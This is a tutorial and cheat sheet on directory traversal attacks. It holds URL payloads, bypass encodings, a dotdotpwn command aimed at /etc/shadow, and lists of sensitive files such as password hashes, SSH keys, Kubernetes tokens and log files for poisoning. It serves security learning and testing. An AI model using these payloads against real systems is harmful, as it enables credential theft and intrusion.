Directory Traversal
Directory Traversal or file path traversal is a web security vulnerability in which an attacker tries to gain the access to unauthorized or restricted files and directories. This might include :
- Application code and data.
- Credentials for back-end systems.
- Sensitive operating files.
How to read files via directory traversal?
For example, a shopping application that displays an image by using an image tag that looks like :
<img src="/image?filename=first.jpg">This image URL takes the filename as an input and then searches for the specified image file on /var/www/images folder where all images are generally stored.
If there is no defense applied for directory traversal attack then an attacker can give another file’s location and try to read it. Suppose the attacker wants to read the passwd file which is stored on the location /etc/passwd then he will modify the URL and request for the file :
http://vulnerable.com/image?filename=../../../etc/passwd../ is used to step up one level in the directory structure in Linux-based systems and on windows both ../ and ..\ can be used. By specifying ../../../ we land on the root directory of the server and from here we can access any file on the server by mentioning its path just like /etc/passwd which we mentioned above. The URL will cause the application to read from the following path :
/var/www/images/../../../etc/passwdObstacles while exploiting file path traversal vulnerabilities.
Putting user's input into file paths
In many applications, user-supplied inputs are placed into the file paths which is a kind of defense against directory traversal attacks.
There are ways by which we can bypass this type of validation.
- Directly reference a file without using any traversal sequence.
http://vulnerable.com/image?filename=/etc/passwd- Using nested traversal sequences such as ….// or ….\/ will revert to a simple traversal sequence when the inner sequence is stripped.
http://vulnerable.com/image?filename=....//....//....//etc/passwd- Sometimes the webserver strips the multipart/form-data request before passing the input to the application. We can bypass this by URL encoding the traversal sequence ../ resulting in ..%2F or double encoding ..%2F to ..%252F. Various non-standard encodings, such as
..%c0%afor..%ef%bc%8f, may also do the trick.
http://vulnerable.com/image?filename=..%252f..%252f..%252fetc/passwd- Mentioning the full path of the file which we want to access
http://vulnerable.com/image?filename=/var/www/html/../../../etc/passwd- When an application requires a user-supplied filename must end with an expected file extension, such as .png, then it might be possible to use a null byte to effectively terminate the file path before the required extension.
http://vulnerable.com/image?filename=../../../etc/passwd%00.pngTOOL FOR DIRECTORY TRAVERSAL
git clone https://github.com/wireghoul/dotdotpwn
perl dotdotpwn.pl -h 10.10.10.10 -m ftp -t 300 -f /etc/shadow -s -q -bPAYLOADS:
- List of traversal sequence
../
..\
..\/
%2e%2e%2f
%252e%252e%252f
%c0%ae%c0%ae%c0%af
%uff0e%uff0e%u2215
%uff0e%uff0e%u2216- 16 bit Unicode Encoding
. = %u002e
/ = %u2215
\ = %u2216- UTF-8 Unicode Encoding
. = %c0%2e, %e0%40%ae, %c0ae
/ = %c0%af, %e0%80%af, %c0%2f
\ = %c0%5c, %c0%80%5c- Bypass “../” replaced by “”
Sometimes you encounter a WAF which removes the “../” characters from the strings and just duplicates them.
..././
...\.\- Bypass “../” with “;”
..;/
http://vulnerable.com/image?filename=..;/..;/sensitive.txt- Double URL Encoding
. = %252e
/ = %252f
\ = %255c- UNC Bypass
\\localhost\c$\windows\win.ini- Java Bypass
url:file:///etc/passwd
url:http://127.0.0.1:8080FILES LIST
- Linux files
/etc/issue
/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/motd
/etc/mysql/my.cnf
/proc/[0-9]*/fd/[0-9]* (first number is the PID, second is the filedescriptor)
/proc/self/environ
/proc/version
/proc/cmdline
/proc/sched_debug
/proc/mounts
/proc/net/arp
/proc/net/route
/proc/net/tcp
/proc/net/udp
/proc/self/cwd/index.php
/proc/self/cwd/main.py
/home/$USER/.bash_history
/home/$USER/.ssh/id_rsa
/run/secrets/kubernetes.io/serviceaccount/token
/run/secrets/kubernetes.io/serviceaccount/namespace
/run/secrets/kubernetes.io/serviceaccount/certificate
/var/run/secrets/kubernetes.io/serviceaccount
/var/lib/mlocate/mlocate.db
/var/lib/mlocate.db- Windows files
Always existing file in recent Windows machine. Ideal to test path traversal but nothing much interesting inside…
c:\windows\system32\license.rtf
c:\windows\system32\eula.txtInteresting files to check out
c:/boot.ini
c:/inetpub/logs/logfiles
c:/inetpub/wwwroot/global.asa
c:/inetpub/wwwroot/index.asp
c:/inetpub/wwwroot/web.config
c:/sysprep.inf
c:/sysprep.xml
c:/sysprep/sysprep.inf
c:/sysprep/sysprep.xml
c:/system32/inetsrv/metabase.xml
c:/sysprep.inf
c:/sysprep.xml
c:/sysprep/sysprep.inf
c:/sysprep/sysprep.xml
c:/system volume information/wpsettings.dat
c:/system32/inetsrv/metabase.xml
c:/unattend.txt
c:/unattend.xml
c:/unattended.txt
c:/unattended.xml
c:/windows/repair/sam
c:/windows/repair/systemThe following log files are controllable and can be included with an evil payload to achieve a command execution
/var/log/apache/access.log
/var/log/apache/error.log
/var/log/httpd/error_log
/usr/local/apache/log/error_log
/usr/local/apache2/log/error_log
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/vsftpd.log
/var/log/sshd.log
/var/log/mailREFERENCES
- Portswigger Directory Traversal :
https://portswigger.net/web-security/file-path-traversal
- Payload all the things :
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Directory%20Traversal
